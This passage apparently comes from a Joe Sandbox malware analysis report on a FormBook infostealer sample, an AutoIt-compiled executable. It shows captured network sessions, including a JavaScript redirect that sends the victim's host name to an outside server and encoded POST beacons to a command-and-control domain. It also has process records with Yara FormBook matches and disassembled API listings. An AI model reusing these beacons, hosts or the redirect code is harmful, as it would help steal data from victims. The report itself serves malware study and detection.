Jan 11, 2025 01:41:27.652823925 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50002	188.114.96.3	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:32.791568041 CET	635	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 207 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 7a 4f 36 2b 53 44 34 4b 2f 6f 56 67 74 4a 53 38 64 41 56 70 4e 6c 6f 6e 35 62 4f 65 6e 62 46 57 6c 63 38 54 64 67 3d Data Ascii: KBEhCJ=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6zO6+SD4K/oVgtJS8dAVpNlon5bOenbFWlc8Tdg=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50003	188.114.96.3	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:35.338614941 CET	655	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 227 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 4a 51 33 71 54 35 50 58 36 73 4d 47 4d 4d 4e 4b 32 35 50 45 77 39 31 76 57 62 74 4f 56 49 58 45 45 51 75 31 41 6c Data Ascii: KBEhCJ=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tJQ3qT5PX6sMGMMNK25PEw91vWbtOVIXEEQu1Al

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50004	188.114.96.3	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:37.919285059 CET	1672	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1243 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 67 31 73 65 6c 66 39 65 45 6d 76 62 74 66 34 72 48 55 4f 41 53 79 47 6b 39 32 48 4b 4f 65 45 51 34 47 35 4b 43 55 6b 2f 6f 55 49 42 63 45 71 42 74 76 56 53 4a 77 7a 69 6c 36 53 52 36 46 4a 36 78 31 35 66 50 4b 79 34 46 66 66 63 70 4b 36 68 63 62 31 56 75 6f 7a 46 31 49 4a 31 37 72 77 47 6a 2f 4a 2b 32 44 39 39 59 6d 4b 70 32 42 78 64 62 4b 34 47 38 66 47 55 4e 6d 57 46 6a 4a 7a 6f 61 4c 56 50 58 45 4b 6a 2b 53 79 54 56 41 75 59 70 49 79 44 69 71 53 68 30 62 35 47 6c 70 42 37 56 [TRUNCATED] Data Ascii: KBEhCJ=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9eEmvbtf4rHUOASyGk92HKOeEQ4G5KCUk/oUIBcEqBtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BxdbK4G8fGUNmWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/8wkefZFFfH8aKZZU0Tg8KYVkL91XIk3f83UW5z+SvZJWI/IqM39R++SfHxQLRpS30tW74SkvfW6ILteCaxnRIdx4EASleOAm3ilTUOyWopWpsjRShsRXIFKYXjR0ex6m3na/hatVKa17jtBFg8RjLm3inQ1CK2U68f9VPMPkpBlHHE+38R3TegZo7uyUvZJSC4r298uyTIJC2YMjK7kCRzUzWYrnaiYAaj825qtqqkI3TNGY6kGpoei56A8YFMK0D7Z8IUggG0zpf/SXWEeI0+pS4ZzLVqIA+fiGTBtGJbFFkVMasF6oRnHz9GDLrTZc9vdM4W3Dypp42ylRS/13jcLlRIEo8XRbEUfW9YGdt4YNRnxIXZXaG4OYrKcyvW/u3GP4cHGEPXcBb37NPSpkRIMLGKeOynN2zk7j1KvyfJRvGQF2MRLQpaDr3ws9fa1NiOC3J/1m2IIXMiztwUoHgs1GgrL5/kCgyqf1xZb2KmGp3LsyjlC4jJnDJzCbS0RXy6TXE4hzwasPP59E3XXli4bDBQ0Y0gH0Pp+zxcvRY58PpkK3bA1ve0qTdboHv30CfuYKNHRw6SWPTvWxagbcV [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50005	188.114.96.3	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:40.592025042 CET	378	OUT	GET /kf1m/?KBEhCJ=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&Kdr=RN-HMNoXj6pXm HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.zkdamdjj.shop User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 01:42:19.974260092 CET	968	IN	HTTP/1.1 522 Date: Sat, 11 Jan 2025 00:42:19 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2F41AZ5AvCHBIA25iI%2BQcVquvGViDRFSxG9T5AAtnPxBK6Cvo9F%2BQYfmC3Sn%2F10RsQSVIoPzSgzMi%2F1aZtSF0bp2r1vwsfeiNxMKzzcKMt%2FXAin9PRq0PsGftiAbZ%2BaohG8VJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 9000dcceee1643bf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=378&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	0
Start time:	19:39:12
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\tfWjjV1LdT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tfWjjV1LdT.exe"
Imagebase:	0x690000
File size:	1'225'216 bytes
MD5 hash:	C3689A08E5E324CDE3000E0DA0261633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:39:16
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tfWjjV1LdT.exe"
Imagebase:	0x8e0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:39:30
Start date:	10/01/2025
Path:	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe"
Imagebase:	0x900000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	19:39:31
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mobsync.exe"
Imagebase:	0x3e0000
File size:	93'696 bytes
MD5 hash:	F7114D05B442F103BD2D3E20E78A7AA5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	19:39:45
Start date:	10/01/2025
Path:	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe"
Imagebase:	0x900000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	19:39:58
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 00693B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B68
IsDebuggerPresent.KERNEL32 ref: 00693B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,007552F8,007552E0,?,?), ref: 00693BEB

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

Part of subcall function 006A092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C14,007552F8,?,?,?), ref: 006A096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00693C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00747770,00000010), ref: 006CD281
SetCurrentDirectoryW.KERNEL32(?,007552F8,?,?,?), ref: 006CD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00744260,007552F8,?,?,?), ref: 006CD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 006CD346

Part of subcall function 00693A46: GetSysColorBrush.USER32(0000000F), ref: 00693A50
Part of subcall function 00693A46: LoadCursorW.USER32(00000000,00007F00), ref: 00693A5F
Part of subcall function 00693A46: LoadIconW.USER32(00000063), ref: 00693A76
Part of subcall function 00693A46: LoadIconW.USER32(000000A4), ref: 00693A88
Part of subcall function 00693A46: LoadIconW.USER32(000000A2), ref: 00693A9A
Part of subcall function 00693A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AC0
Part of subcall function 00693A46: RegisterClassExW.USER32(?), ref: 00693B16

Part of subcall function 006939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A03
Part of subcall function 006939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A24
Part of subcall function 006939D5: ShowWindow.USER32(00000000,?,?), ref: 00693A38
Part of subcall function 006939D5: ShowWindow.USER32(00000000,?,?), ref: 00693A41

Part of subcall function 0069434A: _memset.LIBCMT ref: 00694370
Part of subcall function 0069434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00694415

Strings

runas, xrefs: 006CD33A
%r, xrefs: 00693C44
This is a third-party compiled AutoIt script., xrefs: 006CD279

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%r
API String ID: 529118366-374001893
Opcode ID: 3d71c4a1030d92979fe205e4df3be9caa35dad53d76bc6188d69052e725fc934
Instruction ID: ec21f179f1e6cbe1fc1e34ecbc4545ae8f39df15a5d1e713dd19ea047f11db48
Opcode Fuzzy Hash: 3d71c4a1030d92979fe205e4df3be9caa35dad53d76bc6188d69052e725fc934
Instruction Fuzzy Hash: 5A51E5B0908648EEDF01EBB4DC15EFD7B7EBF45701F00806DF411A66A2DAB85646CB29

Function 006949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 006949CD

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

GetCurrentProcess.KERNEL32(?,0071FAEC,00000000,00000000,?), ref: 00694A9A
IsWow64Process.KERNEL32(00000000), ref: 00694AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00694AE7
FreeLibrary.KERNEL32(00000000), ref: 00694AF2
GetSystemInfo.KERNEL32(00000000), ref: 00694B23
GetSystemInfo.KERNEL32(00000000), ref: 00694B2F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 2848df990b4a1bbc832df0a3c0d283957da4b1f0666ec34ed710cafb419cca43
Instruction ID: 208e94f17bc1ecf9f92153fa4b0d3f35160dd1b8e69ef2b797d249b1e4d0790c
Opcode Fuzzy Hash: 2848df990b4a1bbc832df0a3c0d283957da4b1f0666ec34ed710cafb419cca43
Instruction Fuzzy Hash: F591E83198A7C0DECB31CB688450AEABFFAAF2A300B44496DD0C793B45D635A509D76D

Function 00694E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00694D8E,?,?,00000000,00000000), ref: 00694E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00694D8E,?,?,00000000,00000000), ref: 00694EB0
LoadResource.KERNEL32(?,00000000,?,?,00694D8E,?,?,00000000,00000000,?,?,?,?,?,?,00694E2F), ref: 006CD937
SizeofResource.KERNEL32(?,00000000,?,?,00694D8E,?,?,00000000,00000000,?,?,?,?,?,?,00694E2F), ref: 006CD94C
LockResource.KERNEL32(00694D8E,?,?,00694D8E,?,?,00000000,00000000,?,?,?,?,?,?,00694E2F,00000000), ref: 006CD95F

Strings

SCRIPT, xrefs: 00694EA6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 0abf742fe09237f6c903ac0c3da5d1a10aab85d8ca24e79900e9f79ba41a9697
Instruction ID: f2b25c0e8242e4c12a8b4e6bab565aa1b39a04dcd7bf9bd8fc76e1e2e21dcc8f
Opcode Fuzzy Hash: 0abf742fe09237f6c903ac0c3da5d1a10aab85d8ca24e79900e9f79ba41a9697
Instruction Fuzzy Hash: 73114C75240700ABDB218B69EC48FAB7BBEFBC5B11F108268F40586690DB75EC018660

Function 0069FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pbu, xrefs: 006D49B9
%r, xrefs: 0069FCF3

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbu$%r
API String ID: 3964851224-3538053991
Opcode ID: 74d57005d3385245b49bc680db0717dee6e7681f1d8607f38bf5dad41b060ffe
Instruction ID: 859622c8fc1a6883ab8bc97448684e19d210cb3ec83de299579e0988fc0c7c20
Opcode Fuzzy Hash: 74d57005d3385245b49bc680db0717dee6e7681f1d8607f38bf5dad41b060ffe
Instruction Fuzzy Hash: F3926D70A083419FEB60DF14C480B6AB7E6BF86304F14896DE88A9B351DB75EC45CF96

Function 0069E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Ddu, xrefs: 006D3AF5
Ddu, xrefs: 0069EAC1
Ddu, xrefs: 006D3B2E
Ddu, xrefs: 0069EABA
Variable must be of type 'Object'., xrefs: 006D3E62

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID: Ddu$Ddu$Ddu$Ddu$Variable must be of type 'Object'.
API String ID: 0-808039955
Opcode ID: 53b85c441f12da2f46200cdd8d6660617eed9839c53aeb912324d9ab41ed7b85
Instruction ID: 582e61b61a9d882f969e7c59618d5249e3b4b903f5ef4af7d03f1c4263b8d471
Opcode Fuzzy Hash: 53b85c441f12da2f46200cdd8d6660617eed9839c53aeb912324d9ab41ed7b85
Instruction Fuzzy Hash: FEA26A74A00215CFCF24CF98C480AAAB7BBFF58314F64846AE905AB751D776ED42CB91

Function 006F445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,006CE398), ref: 006F446A
FindFirstFileW.KERNELBASE(?,?), ref: 006F447B
FindClose.KERNEL32(00000000), ref: 006F448B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
